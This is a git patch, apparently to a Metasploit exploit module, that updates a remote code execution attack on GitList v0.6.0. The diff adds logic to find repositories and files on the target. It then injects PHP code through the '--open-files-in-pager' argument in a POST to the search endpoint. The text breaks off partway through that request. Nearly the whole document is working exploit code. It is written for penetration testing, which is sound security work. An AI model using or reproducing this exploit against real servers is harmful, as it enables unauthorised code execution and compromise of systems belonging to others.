From dbd03f99140160efca27bc7d1c1e7657b8ef1023 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Thu, 12 Jul 2018 19:03:52 -0500
Subject: [PATCH] Land #10278, gitlist_arg_injection fixes

---
 .../multi/http/gitlist_arg_injection.rb       | 49 ++++++++++++++++---
 1 file changed, 43 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/http/gitlist_arg_injection.rb b/modules/exploits/multi/http/gitlist_arg_injection.rb
index 1792d8f371..77fc5b3d7c 100644
--- a/modules/exploits/multi/http/gitlist_arg_injection.rb
+++ b/modules/exploits/multi/http/gitlist_arg_injection.rb
@@ -35,13 +35,19 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'GitList v0.6.0', { } ]
         ],
       'Privileged'     => false,
-      'Payload'        => { 'BadChars' => '\'"' },
+      'Payload'        => { 'BadChars' => '\'' },
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Default path to GitList', '/'])
+    ])
+
   end
 
   def check
-    uri = normalize_uri(target_uri.path, '/gitlist/')
+    uri = normalize_uri(target_uri.path)
     res = send_request_cgi(
       'method'  => 'GET',
       'uri'     => uri
@@ -54,11 +60,42 @@ class MetasploitModule < Msf::Exploit::Remote
     Exploit::CheckCode::Safe
   end
 
+  def get_repo
+    repo_res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path)
+    )
+
+    if repo_res && repo_res.code == 200
+      repos = repo_res.body.scan(/\/([^\/]+)\/master\/rss\//).flatten
+      fail_with(Failure::Unreachable, "Could not retrieve any repos") if repos.empty?
+      return repos.detect{ |r| r if has_files?(r) }
+    else
+      fail_with(Failure::Unreachable, "Could not access GitList")
+    end
+  end
+
+  def has_files?(repo)
+    res = send_request_cgi(
+    'method' => 'GET',
+    'uri'    => normalize_uri(target_uri.path, repo, '/')
+    )
+    if res && res.code == 200
+     print_good("Successfully accessed repo #{repo}")
+     return false if res.body.scan(/#{repo}\/blob\/master\//).flatten.empty?
+
+     return true
+    else
+      fail_with(Failure::Unreachable, "Couldn't detect files in #{repo}'s repo")
+    end
+  end
+
   def exploit
-    postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-    cmd = '--open-files-in-pager=php -r "eval(\\"'
-    cmd << payload.encoded
-    cmd << '\\");"'
+    repo = get_repo
+    fail_with(Failure::Unreachable, "No files found in repos") if repo.nil?
+
+    postUri = normalize_uri(target_uri.path, repo << '/tree/c/search')
+    cmd = "--open-files-in-pager=php -r '#{payload.encoded}'"
     send_request_cgi(
       'method' => 'POST',
       'uri'    => postUri,